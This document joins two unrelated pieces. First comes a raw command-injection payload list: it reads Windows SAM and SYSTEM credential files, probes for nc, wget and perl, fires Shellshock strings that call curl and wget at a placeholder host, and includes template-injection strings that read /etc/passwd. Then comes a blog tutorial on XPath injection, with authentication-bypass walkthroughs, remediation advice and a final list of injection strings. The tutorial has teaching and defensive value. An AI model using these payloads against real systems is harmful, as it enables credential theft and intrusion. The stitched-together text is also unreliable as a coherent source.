| type C:\Windows\repair\SAM

; type C:\Windows\repair\SAM

& type C:\Windows\repair\SAM

&& type C:\Windows\repair\SAM

type C:\Windows\repair\SAM

| type C:\Windows\repair\SYSTEM

; type C:\Windows\repair\SYSTEM

& type C:\Windows\repair\SYSTEM

&& type C:\Windows\repair\SYSTEM

type C:\Windows\repair\SYSTEM

| type C:\WINNT\repair\SAM

; type C:\WINNT\repair\SAM

& type C:\WINNT\repair\SAM

&& type C:\WINNT\repair\SAM

type C:\WINNT\repair\SAM

type C:\WINNT\repair\SYSTEM

| type %SYSTEMROOT%\repair\SAM

; type %SYSTEMROOT%\repair\SAM

& type %SYSTEMROOT%\repair\SAM

&& type %SYSTEMROOT%\repair\SAM

type %SYSTEMROOT%\repair\SAM

| type %SYSTEMROOT%\repair\SYSTEM

; type %SYSTEMROOT%\repair\SYSTEM

& type %SYSTEMROOT%\repair\SYSTEM

&& type %SYSTEMROOT%\repair\SYSTEM

type %SYSTEMROOT%\repair\SYSTEM

uname

;uname;

| uname -a

; uname -a

& uname -a

&& uname -a

uname -a

|/usr/bin/id

;|/usr/bin/id|

;/usr/bin/id|

$;/usr/bin/id

() { :;};/usr/bin/perl -e ‘print \”Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\”;system(\”wget http://[Web IP]/.testing/shellshock.txt?vuln=13;curl http://[Web IP]/.testing/shellshock.txt?vuln=15;\”);’

() { :;}; wget http://[Web IP]/.testing/shellshock.txt?vuln=11

| wget http://example.com/.testing/rce.txt

& wget http://example.com/.testing/rce.txt

; wget https://example.com/.testing/rce_vuln.txt

$(`wget https://example.com/.testing/rce_vuln.txt`)

&& wget https://example.com/.testing/rce_vuln.txt

wget https://example.com/.testing/rce_vuln.txt

$(`wget https://example.com/.testing/rce_vuln.txt?req=22jjffjbn`)

which curl

which gcc

which nc

which netcat

which perl

which python

which wget

whoami

| whoami

; whoami

‘ whoami

‘ || whoami

‘ & whoami

‘ && whoami

‘; whoami

” whoami

” || whoami

” | whoami

” & whoami

” && whoami

“; whoami

$(`whoami`)

& whoami

&& whoami

{{ get_user_file(“C:\boot.ini”) }}

{{ get_user_file(“/etc/hosts”) }}

{{ get_user_file(“/etc/passwd”) }}

{{4+4}}

{{4+8}}

{{person.secret}}

{{person.name}}

{1} + {1}

{% For c in [1,2,3]%} {{c, c, c}} {% endfor%}

{{[] .__ Class __.__ base __.__ subclasses __ ()}}

Basic XPath Injection

by Vry4n_ | Mar 18, 2020 | Web Exploitation

XPath Injection attacks occur when a web site uses user-supplied information to construct an XPath query for XML data XPath is a standard language. When using XML for a web site it is common to accept some form of input on the query string to identify the content to locate and display on the page.

By sending intentionally malformed information into the web site, an attacker can find out how the XML data is structured, or access data that he may not normally have access to.

Querying XML is done with XPath, a type of simple descriptive statement that allows the XML query to locate a piece of information.

This input must be sanitized to verify that it doesn’t mess up the XPath query and return the wrong data. No access controls can be implemented within the XML document. Consequently, the entire XML document can be read out in the event of an XPath injection.

https://owasp.org/www-community/attacks/XPATH_Injection

What is XPATH?

XPath is a major element in the XSLT standard. XPath can be used to navigate through elements and attributes in an XML document.

Based on the image above, we describe each level within the XML sample in the following table.

XPATH Example

https://www.freeformatter.com/xpath-tester.html

<?xml version=”1.0″ encoding=”UTF-8″?>

<accounts>

<user category=”user1″>

<username>vry4n</username >

<firstname>Bryan</firstname >

<lastname>Unknown</lastname>

<email>notyourbusiness@vk9-sec.com</email>

<accounttype>administrator</accounttype>

<password>admin123</password>

</user>

<user category=”user2″>

<username>iuchicha</username>

<firstname>Itachi</firstname>

<lastname>Uchiha</lastname>

<email>iuchiha@vk9-sec.com</email>

<accounttype>guest</accounttype>

<password>admin123</password>

</user>

<system category=”sys1″>

<os>windows</os >

<hostname>win.vk9-sec.com</hostname>

<version>Windows Server 2008</version>

<status>Online</status>

</system>

<system category=”sys2″>

<os>linux</os >

<hostname>lin.vk9-sec.com</hostname>

<version>Ubuntu Server</version>

<status>Offline</status>

</system>

</accounts>

Basic queries

https://metacpan.org/release/XML-XPath

1. Select the root node “accounts”, and print the child contents, notice that only one element is returned with whole data

• /accounts

2. Make a selection per child node, now, we have 2 elements printed

• /accounts/user
• //user

• /accounts/system
• //system

Child node content filter

• /accounts/user/email

Filtering Queries

Select a child node that has vry4n as username

• /accounts/user[username=”vry4n”]
• //user[username=”vry4n”]

Select a child node that has windows as os

• /accounts/system[os=”windows”]
• //system[os=”windows”]

Print sys1 attribute category data, within system child node

• /accounts/system[@category=”sys1″]
• //system[@category=”sys1″]

Example 2

• /accounts/user[attribute::category=”user2″]
• //user[attribute::category=”user2″]

Select all child nodes, under accounts root node

• /accounts/child::node()

Filter child nodes, within user nodes

• /accounts/user/child::node()
• //user/child::node()

Filter child nodes, within user nodes

• /accounts/child::system()
• //child::system()

filter a specific user child node

• /accounts/user[username=”vry4n”]/child::node()
• //user[username=”vry4n”]/child::node()

Filter by position

• /accounts/user[position()=2]
• //user[position()=2]

Filter by position

• /accounts/user[2]
• //user[2]

Filter by last position

• /accounts/system[last()]
• //system[last()]

Some Functions

Count

1. Counting the nodes in root or child nodes

in this case the result is 2 “user1”,”user2”

count(query,query)

• count(//user)
• count(/accounts/user)

String-length

Returns the length of a specified string

string-length(query)

• string-length(/accounts/user[1]/email)

Substring

Returns the substring from start to the specified length. First character is 1. Email is <email>notyourbusiness@vk9-sec.com</email>

substring(query,start,len)

• substring(/accounts/user[1]/email,1,7)

Starts-with

Returns True if string1 starts with string2, in this case the value is vry4n

• starts-with(//user[1]/username,v)

Contains

Returns True if string1 contains string2, in this case the value is vry4n

• contains(//user[1]/username,r)

String & number

Returns the value of the argument

• string(//user[1]/username)

The same happens if the value is numeric, if we pass a string we get false

• number(//user[1]/username)

Exploitation example

<Employee ID=”1″>

<UserName>admin</UserName>

<Password>adminpass</Password>

<Signature>g0t r00t?</Signature>

<Type>Admin</Type>

</Employee>

<Employee ID=”2″>

<UserName>adrian</UserName>

<Password>somepassword</Password>

<Signature>Zombie Films Rock!</Signature>

<Type>Admin</Type>

</Employee>

<Employee ID=”3″>

<UserName>john</UserName>

<Password>monkey</Password>

<Signature>I like the smell of confunk</Signature>

<Type>Admin</Type>

</Employee>

Example of a query that a script uses to retrieve data

In this example we have an authentication mechanism that accepts username & password

Php code

Query

• $lXPathQueryString = “//Employee[UserName='{USERNAME}’ and Password='{PASSWORD}’]”;

Exploitation

1. Using the regular authentication method constructs the following query

• $lXPathQueryString = “//Employee[UserName=’admin’ and Password=’admin’]”;

2. Exploiting this query we can inject a query and modify its behavior, to show the whole database

• the first step is to insert a single quote (‘) in the field to be tested,
• introducing a syntax error in the query
• check whether the application returns an error message.

Username: admin’ or 1=1 or ‘a’=’a

Password: admin123

• $lXPathQueryString = “//Employee[UserName= admin’ or 1=1 or ‘a’=’a’ and Password=’admin123′]”;

In this case, only the first part of the XPath needs to be true. The password part becomes irrelevant, and the UserName part will match ALL employees because of the “1=1” which is always true.

3. To show a single user results, if it exists

admin’ or ‘a’=’a

• $lXPathQueryString = “//Employee[UserName=’admin’ or ‘a’=’a’ and Password=’admin123′]”;

The password can also be text’ or ‘1’ = ‘1

• $lXPathQueryString = “//Employee[UserName=’admin’ or ‘a’=’a’ and Password=’text’ or ‘1’ = ‘1’]”;

Remediation

XPath injection attacks are much like SQL injection attacks. Most of these preventative methods are the same as well to prevent other typical code injection attacks.

• Input Validation: It is one of the best measures to defend applications from XPATH injection attacks. The developer has to ensure that the application does accept only legitimate input.
• Parameterization: In Parameterized queries, the queries are precompiled and instead of passing user input as expressions, parameters are passed.

Most sites have a way to store data, the most common of which is a database. However, some sites use XML to store data, and use a method of looking at the data known as XPath.

Query

• ‘ or ‘1’=’1
• ‘ or ”=’
• x’ or 1=1 or ‘x’=’y
• /
• //
• //*
• */*
• @*
• count(/child::node())
• x’ or name()=’username’ or ‘x’=’y
• ‘ and count(/*)=1 and ‘1’=’1
• ‘ and count(/@*)=1 and ‘1’=’1
• ‘ and count(/comment())=1 and ‘1’=’1